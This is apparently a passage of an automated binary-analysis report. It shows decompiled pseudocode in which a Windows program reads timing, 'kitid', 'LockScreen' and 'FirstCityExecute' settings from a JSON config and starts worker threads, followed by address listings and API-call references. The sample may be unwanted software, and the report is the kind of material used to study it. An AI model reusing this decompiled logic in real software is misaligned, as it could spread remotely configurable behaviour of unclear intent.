                                                                                        							_t295 =  *((intOrPtr*)(_t295 - 4));
                                                                                        							_t326 = _t326 + 0x23;
                                                                                        							if(_t226 > 0x1f) {
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        							}
                                                                                        						}
                                                                                        						_push(_t326);
                                                                                        						E00175733(_t226, _t295);
                                                                                        						_t346 = _t346 + 8;
                                                                                        					}
                                                                                        					_t170 =  &_v44;
                                                                                        					_push(_t170);
                                                                                        					_push("time2");
                                                                                        					L00176866();
                                                                                        					L00176860();
                                                                                        					if(_t170[0x14] >= 0x10) {
                                                                                        						_t170 =  *_t170;
                                                                                        					}
                                                                                        					_t171 = atoi(_t170);
                                                                                        					_t306 = _v24;
                                                                                        					_t347 = _t346 + 4;
                                                                                        					 *0x19dbb0 = _t171;
                                                                                        					if(_t306 < 0x10) {
                                                                                        						L15:
                                                                                        						_t172 =  &_v44;
                                                                                        						_push(_t172);
                                                                                        						_push("delaytime2");
                                                                                        						L00176866();
                                                                                        						L00176860();
                                                                                        						if(_t172[0x14] >= 0x10) {
                                                                                        							_t172 =  *_t172;
                                                                                        						}
                                                                                        						_t173 = atoi(_t172);
                                                                                        						_t307 = _v24;
                                                                                        						_t348 = _t347 + 4;
                                                                                        						 *0x19dbb8 = _t173;
                                                                                        						if(_t307 >= 0x10) {
                                                                                        							_t293 = _v44;
                                                                                        							_t324 = _t307 + 1;
                                                                                        							_t220 = _t293;
                                                                                        							if(_t324 >= 0x1000) {
                                                                                        								_t293 =  *((intOrPtr*)(_t293 - 4));
                                                                                        								_t324 = _t324 + 0x23;
                                                                                        								if(_t220 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t324);
                                                                                        							E00175733(_t220, _t293);
                                                                                        							_t348 = _t348 + 8;
                                                                                        						}
                                                                                        						_t174 =  &_v44;
                                                                                        						_push(_t174);
                                                                                        						_push("checktime1");
                                                                                        						L00176866();
                                                                                        						L00176860();
                                                                                        						if(_t174[0x14] >= 0x10) {
                                                                                        							_t174 =  *_t174;
                                                                                        						}
                                                                                        						_t175 = atoi(_t174);
                                                                                        						_t308 = _v24;
                                                                                        						_t349 = _t348 + 4;
                                                                                        						 *0x19d020 = _t175;
                                                                                        						if(_t308 >= 0x10) {
                                                                                        							_t292 = _v44;
                                                                                        							_t323 = _t308 + 1;
                                                                                        							_t217 = _t292;
                                                                                        							if(_t323 >= 0x1000) {
                                                                                        								_t292 =  *((intOrPtr*)(_t292 - 4));
                                                                                        								_t323 = _t323 + 0x23;
                                                                                        								if(_t217 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t323);
                                                                                        							E00175733(_t217, _t292);
                                                                                        							_t349 = _t349 + 8;
                                                                                        						}
                                                                                        						_t176 =  &_v44;
                                                                                        						_push(_t176);
                                                                                        						_push("checktime2");
                                                                                        						L00176866();
                                                                                        						L00176860();
                                                                                        						if(_t176[0x14] >= 0x10) {
                                                                                        							_t176 =  *_t176;
                                                                                        						}
                                                                                        						_t177 = atoi(_t176);
                                                                                        						_t309 = _v24;
                                                                                        						_t350 = _t349 + 4;
                                                                                        						 *0x19d024 = _t177;
                                                                                        						if(_t309 >= 0x10) {
                                                                                        							_t291 = _v44;
                                                                                        							_t322 = _t309 + 1;
                                                                                        							_t214 = _t291;
                                                                                        							if(_t322 >= 0x1000) {
                                                                                        								_t291 =  *((intOrPtr*)(_t291 - 4));
                                                                                        								_t322 = _t322 + 0x23;
                                                                                        								if(_t214 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t322);
                                                                                        							E00175733(_t214, _t291);
                                                                                        							_t350 = _t350 + 8;
                                                                                        						}
                                                                                        						_t178 =  &_v44;
                                                                                        						_push(_t178);
                                                                                        						_push("kitid");
                                                                                        						L00176866();
                                                                                        						L00176860();
                                                                                        						if(_t178[0x14] >= 0x10) {
                                                                                        							_t178 =  *_t178;
                                                                                        						}
                                                                                        						_t179 = atoi(_t178);
                                                                                        						_t310 = _v24;
                                                                                        						_t351 = _t350 + 4;
                                                                                        						 *0x19dbc0 = _t179;
                                                                                        						if(_t310 >= 0x10) {
                                                                                        							_t290 = _v44;
                                                                                        							_t321 = _t310 + 1;
                                                                                        							_t211 = _t290;
                                                                                        							if(_t321 >= 0x1000) {
                                                                                        								_t290 =  *((intOrPtr*)(_t290 - 4));
                                                                                        								_t321 = _t321 + 0x23;
                                                                                        								if(_t211 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t321);
                                                                                        							E00175733(_t211, _t290);
                                                                                        							_t351 = _t351 + 8;
                                                                                        						}
                                                                                        						_t180 =  &_v44;
                                                                                        						_push(_t180);
                                                                                        						_push("logo2");
                                                                                        						L00176866();
                                                                                        						L00176860();
                                                                                        						_t311 = _t180;
                                                                                        						_v8 = 2;
                                                                                        						if( *((intOrPtr*)(_t311 + 0x14)) >= 0x10) {
                                                                                        							_t311 =  *_t311;
                                                                                        						}
                                                                                        						_t271 = _t311;
                                                                                        						_t52 = _t271 + 1; // 0x1
                                                                                        						_v48 = _t52;
                                                                                        						do {
                                                                                        							_t182 =  *_t271;
                                                                                        							_t271 = _t271 + 1;
                                                                                        						} while (_t182 != 0);
                                                                                        						E00163450(_t229, _t311, _t328, _t311, _t271 - _v48);
                                                                                        						_t312 = _v24;
                                                                                        						_v8 = 1;
                                                                                        						if(_t312 >= 0x10) {
                                                                                        							_t289 = _v44;
                                                                                        							_t320 = _t312 + 1;
                                                                                        							_t208 = _t289;
                                                                                        							if(_t320 >= 0x1000) {
                                                                                        								_t289 =  *((intOrPtr*)(_t289 - 4));
                                                                                        								_t320 = _t320 + 0x23;
                                                                                        								if(_t208 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t320);
                                                                                        							E00175733(_t208, _t289);
                                                                                        							_t351 = _t351 + 8;
                                                                                        						}
                                                                                        						_t184 =  &_v44;
                                                                                        						_push(_t184);
                                                                                        						_push("LeadSwitch");
                                                                                        						L00176866();
                                                                                        						L00176860();
                                                                                        						if(_t184[0x14] >= 0x10) {
                                                                                        							_t184 =  *_t184;
                                                                                        						}
                                                                                        						_t185 = atoi(_t184);
                                                                                        						_t313 = _v24;
                                                                                        						_t352 = _t351 + 4;
                                                                                        						 *0x19dbbc = _t185;
                                                                                        						if(_t313 >= 0x10) {
                                                                                        							_t288 = _v44;
                                                                                        							_t319 = _t313 + 1;
                                                                                        							_t205 = _t288;
                                                                                        							if(_t319 >= 0x1000) {
                                                                                        								_t288 =  *((intOrPtr*)(_t288 - 4));
                                                                                        								_t319 = _t319 + 0x23;
                                                                                        								if(_t205 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t319);
                                                                                        							E00175733(_t205, _t288);
                                                                                        							_t352 = _t352 + 8;
                                                                                        						}
                                                                                        						_t186 =  &_v44;
                                                                                        						_push(_t186);
                                                                                        						_push("FirstCity");
                                                                                        						L00176866();
                                                                                        						L00176860();
                                                                                        						if(_t186[0x14] >= 0x10) {
                                                                                        							_t186 =  *_t186;
                                                                                        						}
                                                                                        						_t187 = atoi(_t186);
                                                                                        						_t314 = _v24;
                                                                                        						_t353 = _t352 + 4;
                                                                                        						 *0x19dbc4 = _t187;
                                                                                        						if(_t314 >= 0x10) {
                                                                                        							_t287 = _v44;
                                                                                        							_t318 = _t314 + 1;
                                                                                        							_t202 = _t287;
                                                                                        							if(_t318 >= 0x1000) {
                                                                                        								_t287 =  *((intOrPtr*)(_t287 - 4));
                                                                                        								_t318 = _t318 + 0x23;
                                                                                        								if(_t202 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t318);
                                                                                        							E00175733(_t202, _t287);
                                                                                        							_t353 = _t353 + 8;
                                                                                        						}
                                                                                        						_t188 =  &_v44;
                                                                                        						_push(_t188);
                                                                                        						_push("FirstCityExecute");
                                                                                        						L00176866();
                                                                                        						L00176860();
                                                                                        						if(_t188[0x14] >= 0x10) {
                                                                                        							_t188 =  *_t188;
                                                                                        						}
                                                                                        						_t189 = atoi(_t188);
                                                                                        						_t315 = _v24;
                                                                                        						_t354 = _t353 + 4;
                                                                                        						 *0x19dbc8 = _t189;
                                                                                        						if(_t315 >= 0x10) {
                                                                                        							_t286 = _v44;
                                                                                        							_t317 = _t315 + 1;
                                                                                        							_t199 = _t286;
                                                                                        							if(_t317 >= 0x1000) {
                                                                                        								_t286 =  *((intOrPtr*)(_t286 - 4));
                                                                                        								_t317 = _t317 + 0x23;
                                                                                        								if(_t199 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t317);
                                                                                        							E00175733(_t199, _t286);
                                                                                        							_t354 = _t354 + 8;
                                                                                        						}
                                                                                        						_t190 =  &_v44;
                                                                                        						_push(_t190);
                                                                                        						_push("LockScreen");
                                                                                        						L00176866();
                                                                                        						L00176860();
                                                                                        						if(_t190[0x14] >= 0x10) {
                                                                                        							_t190 =  *_t190;
                                                                                        						}
                                                                                        						_t191 = atoi(_t190);
                                                                                        						_t316 = _v24;
                                                                                        						_t355 = _t354 + 4;
                                                                                        						 *0x19dbcc = _t191;
                                                                                        						if(_t316 >= 0x10) {
                                                                                        							_t285 = _v44;
                                                                                        							_t316 = _t316 + 1;
                                                                                        							_t196 = _t285;
                                                                                        							if(_t316 >= 0x1000) {
                                                                                        								_t285 =  *((intOrPtr*)(_t285 - 4));
                                                                                        								_t316 = _t316 + 0x23;
                                                                                        								if(_t196 > 0x1f) {
                                                                                        									__imp___invalid_parameter_noinfo_noreturn();
                                                                                        								}
                                                                                        							}
                                                                                        							_push(_t316);
                                                                                        							E00175733(_t196, _t285);
                                                                                        							_t355 = _t355 + 8;
                                                                                        						}
                                                                                        						_push(0);
                                                                                        						_t356 = _t355 - 0x18;
                                                                                        						_t282 = _t356;
                                                                                        						_v48 = _t356;
                                                                                        						 *((intOrPtr*)(_t282 + 0x10)) = 0;
                                                                                        						 *((intOrPtr*)(_t282 + 0x14)) = 0xf;
                                                                                        						 *_t282 = 0;
                                                                                        						E00163450(_t229, _t316, _t328, ",", 1);
                                                                                        						_push(0x19dbd8);
                                                                                        						_t357 = _t356 - 0x18;
                                                                                        						_v8 = 3;
                                                                                        						_push(_t357);
                                                                                        						_push("SdEnv");
                                                                                        						L00176866();
                                                                                        						L00176860();
                                                                                        						_v8 = 1;
                                                                                        						E00173BD0(_t316);
                                                                                        						_t338 = __imp___beginthreadex;
                                                                                        						_t342 = _t357 + 0x38;
                                                                                        						if( *0x19dbac != 0 &&  *0x19dbc0 != 0) {
                                                                                        							 *_t338(0, 0, E001727D0, _t328, 0, 0); // executed
                                                                                        							_t342 = _t342 + 0x18;
                                                                                        						}
                                                                                        						if( *0x19dbb0 != 0 &&  *0x19d038 != 0) {
                                                                                        							 *_t338(0, 0, E0016E9A0, _t328, 0, 0); // executed
                                                                                        							_t342 = _t342 + 0x18;
                                                                                        						}
                                                                                        						goto L86;
                                                                                        					} else {
                                                                                        						_t294 = _v44;
                                                                                        						_t325 = _t306 + 1;
                                                                                        						_t223 = _t294;
                                                                                        						if(_t325 >= 0x1000) {
                                                                                        							_t294 =  *((intOrPtr*)(_t294 - 4));
                                                                                        							_t325 = _t325 + 0x23;
                                                                                        							if(_t223 > 0x1f) {
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        							}
                                                                                        						}
                                                                                        						_push(_t325);
                                                                                        						E00175733(_t223, _t294);
                                                                                        						_t347 = _t347 + 8;
                                                                                        						goto L15;
                                                                                        					}
                                                                                        				}
                                                                                        			}
























































































































                                                                                        0x001745a0
                                                                                        0x001745a3
                                                                                        0x001745b7
                                                                                        0x001745be
                                                                                        0x001745c7
                                                                                        0x001745cd
                                                                                        0x001745d1
                                                                                        0x001745d6
                                                                                        0x001745da
                                                                                        0x001745e1
                                                                                        0x001745ed
                                                                                        0x001745f0
                                                                                        0x001745f7
                                                                                        0x001745fc
                                                                                        0x00174604
                                                                                        0x0017460f
                                                                                        0x00174616
                                                                                        0x0017461b
                                                                                        0x00174623
                                                                                        0x00174627
                                                                                        0x00174628
                                                                                        0x00174628
                                                                                        0x0017462e
                                                                                        0x00174635
                                                                                        0x0017463c
                                                                                        0x00174b58
                                                                                        0x00174b5f
                                                                                        0x00174e37
                                                                                        0x00174e46
                                                                                        0x00174e55
                                                                                        0x00174e60
                                                                                        0x00174e68
                                                                                        0x00174e7f
                                                                                        0x00174e7f
                                                                                        0x00174b6d
                                                                                        0x00174b72
                                                                                        0x00174b78
                                                                                        0x00174b7b
                                                                                        0x00174b80
                                                                                        0x00174b8b
                                                                                        0x00174c4a
                                                                                        0x00174c4a
                                                                                        0x00174c4d
                                                                                        0x00174c50
                                                                                        0x00174c52
                                                                                        0x00174c5a
                                                                                        0x00174c5d
                                                                                        0x00174c64
                                                                                        0x00174c6b
                                                                                        0x00174c70
                                                                                        0x00174c70
                                                                                        0x00174c73
                                                                                        0x00174c76
                                                                                        0x00174c82
                                                                                        0x00174c86
                                                                                        0x00174c93
                                                                                        0x00174c9a
                                                                                        0x00174c9e
                                                                                        0x00174ca2
                                                                                        0x00174caa
                                                                                        0x00174caf
                                                                                        0x00174dea
                                                                                        0x00174dea
                                                                                        0x00174ded
                                                                                        0x00174df0
                                                                                        0x00174df2
                                                                                        0x00174df7
                                                                                        0x00174dfe
                                                                                        0x00174e05
                                                                                        0x00174e10
                                                                                        0x00174e10
                                                                                        0x00174e13
                                                                                        0x00174e16
                                                                                        0x00174e22
                                                                                        0x00174e26
                                                                                        0x00174e2b
                                                                                        0x00174e2f
                                                                                        0x00174e34
                                                                                        0x00000000
                                                                                        0x00174e34
                                                                                        0x00174cb5
                                                                                        0x00174cba
                                                                                        0x00174cc0
                                                                                        0x00174ccc
                                                                                        0x00174cd3
                                                                                        0x00174cd6
                                                                                        0x00174cda
                                                                                        0x00174cdd
                                                                                        0x00174ce1
                                                                                        0x00174ce6
                                                                                        0x00174ceb
                                                                                        0x00174cf0
                                                                                        0x00174cf4
                                                                                        0x00174cf8
                                                                                        0x00174cfc
                                                                                        0x00174d05
                                                                                        0x00174d08
                                                                                        0x00174d11
                                                                                        0x00174d15
                                                                                        0x00174d19
                                                                                        0x00174d22
                                                                                        0x00174d26
                                                                                        0x00174d2b
                                                                                        0x00174d32
                                                                                        0x00174d3a
                                                                                        0x00174d3f
                                                                                        0x00174d44
                                                                                        0x00174d4c
                                                                                        0x00174d50
                                                                                        0x00174d54
                                                                                        0x00174d57
                                                                                        0x00174d5c
                                                                                        0x00174d5f
                                                                                        0x00174d63
                                                                                        0x00174d67
                                                                                        0x00174d6c
                                                                                        0x00174d71
                                                                                        0x00174d75
                                                                                        0x00174d79
                                                                                        0x00174d7d
                                                                                        0x00174d80
                                                                                        0x00174d84
                                                                                        0x00174d88
                                                                                        0x00174d91
                                                                                        0x00174d95
                                                                                        0x00174d9a
                                                                                        0x00174d9f
                                                                                        0x00174da4
                                                                                        0x00174da9
                                                                                        0x00174db1
                                                                                        0x00174db5
                                                                                        0x00174dba
                                                                                        0x00174dba
                                                                                        0x00174dc0
                                                                                        0x00174ddf
                                                                                        0x00174de4
                                                                                        0x00174de5
                                                                                        0x00000000
                                                                                        0x00174dc0
                                                                                        0x00174b91
                                                                                        0x00174b96
                                                                                        0x00174c20
                                                                                        0x00174c3f
                                                                                        0x00174c44
                                                                                        0x00174c45
                                                                                        0x00000000
                                                                                        0x00174c20
                                                                                        0x00174b9c
                                                                                        0x00174ba3
                                                                                        0x00174ba6
                                                                                        0x00174ba9
                                                                                        0x00174bad
                                                                                        0x00174bb6
                                                                                        0x00174bba
                                                                                        0x00174bc3
                                                                                        0x00174bc7
                                                                                        0x00174bcb
                                                                                        0x00174bcf
                                                                                        0x00174bd3
                                                                                        0x00174bdc
                                                                                        0x00174bdf
                                                                                        0x00174be3
                                                                                        0x00174be7
                                                                                        0x00174bf0
                                                                                        0x00174bf4
                                                                                        0x00174bf9
                                                                                        0x00174bfe
                                                                                        0x00174c03
                                                                                        0x00174c0b
                                                                                        0x00174c0f
                                                                                        0x00174c13
                                                                                        0x00000000
                                                                                        0x00174642
                                                                                        0x00174642
                                                                                        0x00174645
                                                                                        0x00174646
                                                                                        0x00174651
                                                                                        0x00174658
                                                                                        0x00174661
                                                                                        0x00174663
                                                                                        0x00174663
                                                                                        0x0017466c
                                                                                        0x0017466e
                                                                                        0x00174671
                                                                                        0x00174674
                                                                                        0x0017467c
                                                                                        0x0017467e
                                                                                        0x00174681
                                                                                        0x00174682
                                                                                        0x0017468a
                                                                                        0x0017468c
                                                                                        0x0017468f
                                                                                        0x0017469a
                                                                                        0x0017469c
                                                                                        0x0017469c
                                                                                        0x0017469a
                                                                                        0x001746a2
                                                                                        0x001746a4
                                                                                        0x001746a9
                                                                                        0x001746a9
                                                                                        0x001746ac
                                                                                        0x001746af
                                                                                        0x001746b0
                                                                                        0x001746bb
                                                                                        0x001746c2
                                                                                        0x001746cb
                                                                                        0x001746cd
                                                                                        0x001746cd
                                                                                        0x001746d0
                                                                                        0x001746d2
                                                                                        0x001746d5
                                                                                        0x001746d8
                                                                                        0x001746e0
                                                                                        0x00174710
                                                                                        0x00174710
                                                                                        0x00174713
                                                                                        0x00174714
                                                                                        0x0017471f
                                                                                        0x00174726
                                                                                        0x0017472f
                                                                                        0x00174731
                                                                                        0x00174731
                                                                                        0x00174734
                                                                                        0x00174736
                                                                                        0x00174739
                                                                                        0x0017473c
                                                                                        0x00174744
                                                                                        0x00174746
                                                                                        0x00174749
                                                                                        0x0017474a
                                                                                        0x00174752
                                                                                        0x00174754
                                                                                        0x00174757
                                                                                        0x00174762
                                                                                        0x00174764
                                                                                        0x00174764
                                                                                        0x00174762
                                                                                        0x0017476a
                                                                                        0x0017476c
                                                                                        0x00174771
                                                                                        0x00174771
                                                                                        0x00174774
                                                                                        0x00174777
                                                                                        0x00174778
                                                                                        0x00174783
                                                                                        0x0017478a
                                                                                        0x00174793
                                                                                        0x00174795
                                                                                        0x00174795
                                                                                        0x00174798
                                                                                        0x0017479a
                                                                                        0x0017479d
                                                                                        0x001747a0
                                                                                        0x001747a8
                                                                                        0x001747aa
                                                                                        0x001747ad
                                                                                        0x001747ae
                                                                                        0x001747b6
                                                                                        0x001747b8
                                                                                        0x001747bb
                                                                                        0x001747c6
                                                                                        0x001747c8
                                                                                        0x001747c8
                                                                                        0x001747c6
                                                                                        0x001747ce
                                                                                        0x001747d0
                                                                                        0x001747d5
                                                                                        0x001747d5
                                                                                        0x001747d8
                                                                                        0x001747db
                                                                                        0x001747dc
                                                                                        0x001747e7
                                                                                        0x001747ee
                                                                                        0x001747f7
                                                                                        0x001747f9
                                                                                        0x001747f9
                                                                                        0x001747fc
                                                                                        0x001747fe
                                                                                        0x00174801
                                                                                        0x00174804
                                                                                        0x0017480c
                                                                                        0x0017480e
                                                                                        0x00174811
                                                                                        0x00174812
                                                                                        0x0017481a
                                                                                        0x0017481c
                                                                                        0x0017481f
                                                                                        0x0017482a
                                                                                        0x0017482c
                                                                                        0x0017482c
                                                                                        0x0017482a
                                                                                        0x00174832
                                                                                        0x00174834
                                                                                        0x00174839
                                                                                        0x00174839
                                                                                        0x0017483c
                                                                                        0x0017483f
                                                                                        0x00174840
                                                                                        0x0017484b
                                                                                        0x00174852
                                                                                        0x0017485b
                                                                                        0x0017485d
                                                                                        0x0017485d
                                                                                        0x00174860
                                                                                        0x00174862
                                                                                        0x00174865
                                                                                        0x00174868
                                                                                        0x00174870
                                                                                        0x00174872
                                                                                        0x00174875
                                                                                        0x00174876
                                                                                        0x0017487e
                                                                                        0x00174880
                                                                                        0x00174883
                                                                                        0x0017488e
                                                                                        0x00174890
                                                                                        0x00174890
                                                                                        0x0017488e
                                                                                        0x00174896
                                                                                        0x00174898
                                                                                        0x0017489d
                                                                                        0x0017489d
                                                                                        0x001748a0
                                                                                        0x001748a3
                                                                                        0x001748a4
                                                                                        0x001748af
                                                                                        0x001748b6
                                                                                        0x001748bb
                                                                                        0x001748c1
                                                                                        0x001748c5
                                                                                        0x001748c7
                                                                                        0x001748c7
                                                                                        0x001748c9
                                                                                        0x001748cb
                                                                                        0x001748ce
                                                                                        0x001748d1
                                                                                        0x001748d1
                                                                                        0x001748d3
                                                                                        0x001748d4
                                                                                        0x001748e2
                                                                                        0x001748e7
                                                                                        0x001748ea
                                                                                        0x001748f1
                                                                                        0x001748f3
                                                                                        0x001748f6
                                                                                        0x001748f7
                                                                                        0x001748ff
                                                                                        0x00174901
                                                                                        0x00174904
                                                                                        0x0017490f
                                                                                        0x00174911
                                                                                        0x00174911
                                                                                        0x0017490f
                                                                                        0x00174917
                                                                                        0x00174919
                                                                                        0x0017491e
                                                                                        0x0017491e
                                                                                        0x00174921
                                                                                        0x00174924
                                                                                        0x00174925
                                                                                        0x00174930
                                                                                        0x00174937
                                                                                        0x00174940
                                                                                        0x00174942
                                                                                        0x00174942
                                                                                        0x00174945
                                                                                        0x00174947
                                                                                        0x0017494a
                                                                                        0x0017494d
                                                                                        0x00174955
                                                                                        0x00174957
                                                                                        0x0017495a
                                                                                        0x0017495b
                                                                                        0x00174963
                                                                                        0x00174965
                                                                                        0x00174968
                                                                                        0x00174973
                                                                                        0x00174975
                                                                                        0x00174975
                                                                                        0x00174973
                                                                                        0x0017497b
                                                                                        0x0017497d
                                                                                        0x00174982
                                                                                        0x00174982
                                                                                        0x00174985
                                                                                        0x00174988
                                                                                        0x00174989
                                                                                        0x00174994
                                                                                        0x0017499b
                                                                                        0x001749a4
                                                                                        0x001749a6
                                                                                        0x001749a6
                                                                                        0x001749a9
                                                                                        0x001749ab
                                                                                        0x001749ae
                                                                                        0x001749b1
                                                                                        0x001749b9
                                                                                        0x001749bb
                                                                                        0x001749be
                                                                                        0x001749bf
                                                                                        0x001749c7
                                                                                        0x001749c9
                                                                                        0x001749cc
                                                                                        0x001749d7
                                                                                        0x001749d9
                                                                                        0x001749d9
                                                                                        0x001749d7
                                                                                        0x001749df
                                                                                        0x001749e1
                                                                                        0x001749e6
                                                                                        0x001749e6
                                                                                        0x001749e9
                                                                                        0x001749ec
                                                                                        0x001749ed
                                                                                        0x001749f8
                                                                                        0x001749ff
                                                                                        0x00174a08
                                                                                        0x00174a0a
                                                                                        0x00174a0a
                                                                                        0x00174a0d
                                                                                        0x00174a0f
                                                                                        0x00174a12
                                                                                        0x00174a15
                                                                                        0x00174a1d
                                                                                        0x00174a1f
                                                                                        0x00174a22
                                                                                        0x00174a23
                                                                                        0x00174a2b
                                                                                        0x00174a2d
                                                                                        0x00174a30
                                                                                        0x00174a3b
                                                                                        0x00174a3d
                                                                                        0x00174a3d
                                                                                        0x00174a3b
                                                                                        0x00174a43
                                                                                        0x00174a45
                                                                                        0x00174a4a
                                                                                        0x00174a4a
                                                                                        0x00174a4d
                                                                                        0x00174a50
                                                                                        0x00174a51
                                                                                        0x00174a5c
                                                                                        0x00174a63
                                                                                        0x00174a6c
                                                                                        0x00174a6e
                                                                                        0x00174a6e
                                                                                        0x00174a71
                                                                                        0x00174a73
                                                                                        0x00174a76
                                                                                        0x00174a79
                                                                                        0x00174a81
                                                                                        0x00174a83
                                                                                        0x00174a86
                                                                                        0x00174a87
                                                                                        0x00174a8f
                                                                                        0x00174a91
                                                                                        0x00174a94
                                                                                        0x00174a9f
                                                                                        0x00174aa1
                                                                                        0x00174aa1
                                                                                        0x00174a9f
                                                                                        0x00174aa7
                                                                                        0x00174aa9
                                                                                        0x00174aae
                                                                                        0x00174aae
                                                                                        0x00174ab1
                                                                                        0x00174ab3
                                                                                        0x00174ab6
                                                                                        0x00174ab8
                                                                                        0x00174abd
                                                                                        0x00174ac4
                                                                                        0x00174ad0
                                                                                        0x00174ad3
                                                                                        0x00174ad8
                                                                                        0x00174add
                                                                                        0x00174ae0
                                                                                        0x00174aea
                                                                                        0x00174aeb
                                                                                        0x00174af0
                                                                                        0x00174af7
                                                                                        0x00174afc
                                                                                        0x00174b00
                                                                                        0x00174b05
                                                                                        0x00174b0b
                                                                                        0x00174b15
                                                                                        0x00174b2e
                                                                                        0x00174b30
                                                                                        0x00174b30
                                                                                        0x00174b3a
                                                                                        0x00174b53
                                                                                        0x00174b55
                                                                                        0x00174b55
                                                                                        0x00000000
                                                                                        0x001746e2
                                                                                        0x001746e2
                                                                                        0x001746e5
                                                                                        0x001746e6
                                                                                        0x001746ee
                                                                                        0x001746f0
                                                                                        0x001746f3
                                                                                        0x001746fe
                                                                                        0x00174700
                                                                                        0x00174700
                                                                                        0x001746fe
                                                                                        0x00174706
                                                                                        0x00174708
                                                                                        0x0017470d
                                                                                        0x00000000
                                                                                        0x0017470d
                                                                                        0x001746e0

                                                                                        APIs
                                                                                          • Part of subcall function 00163540: memmove.VCRUNTIME140(?,2C80D730,?,?,?,?,?,?,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731), ref: 0016356B
                                                                                          • Part of subcall function 00173510: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,2C80D730,?,6C193C6C), ref: 0017362B
                                                                                        • ??0Value@Json@@QAE@W4ValueType@1@@Z.JSONCPP(00000000,systray), ref: 00174604
                                                                                        • ??0Reader@Json@@QAE@XZ.JSONCPP(00000000,systray), ref: 00174616
                                                                                        • ?parse@Reader@Json@@QAE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVValue@2@_N@Z.JSONCPP(013C1CEC,?,00000001,00000000,systray), ref: 00174635
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(time1,?,013C1CEC,?,00000001,00000000,systray), ref: 00174651
                                                                                        • ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.JSONCPP(time1,?,013C1CEC,?,00000001,00000000,systray), ref: 00174658
                                                                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,time1,?,013C1CEC,?,00000001,00000000,systray), ref: 0017466C
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000007,?,?,00000000,2C80D730), ref: 0017469C
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(time2,?,00000007,?,?,00000000,2C80D730), ref: 001746BB
                                                                                        • ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.JSONCPP(time2,?,00000007,?,?,00000000,2C80D730), ref: 001746C2
                                                                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,time2,?,00000007,?,?,00000000,2C80D730), ref: 001746D0
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,2C80D730), ref: 00174700
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(delaytime2,?,?,?,?,?,00000000,2C80D730), ref: 0017471F
                                                                                        • ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.JSONCPP(delaytime2,?,?,?,?,?,00000000,2C80D730), ref: 00174726
                                                                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,delaytime2,?,?,?,?,?,00000000,2C80D730), ref: 00174734
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000,2C80D730), ref: 00174764
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(checktime1,?,?,?,?,?,?,00000000,2C80D730), ref: 00174783
                                                                                        • ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.JSONCPP(checktime1,?,?,?,?,?,?,00000000,2C80D730), ref: 0017478A
                                                                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,checktime1,?,?,?,?,?,?,00000000,2C80D730), ref: 00174798
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,2C80D730), ref: 001747C8
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(checktime2,?,?,?,?,?,?,?,00000000,2C80D730), ref: 001747E7
                                                                                        • ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.JSONCPP(checktime2,?,?,?,?,?,?,?,00000000,2C80D730), ref: 001747EE
                                                                                        • atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,checktime2,?,?,?,?,?,?,?,00000000,2C80D730), ref: 001747FC
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00000000,2C80D730), ref: 0017482C
                                                                                        • ??AValue@Json@@QAEAAV01@PBD@Z.JSONCPP(kitid,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 0017484B
                                                                                        • ?asString@Value@Json@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.JSONCPP(kitid,?,?,?,?,?,?,?,?,00000000,2C80D730), ref: 00174852
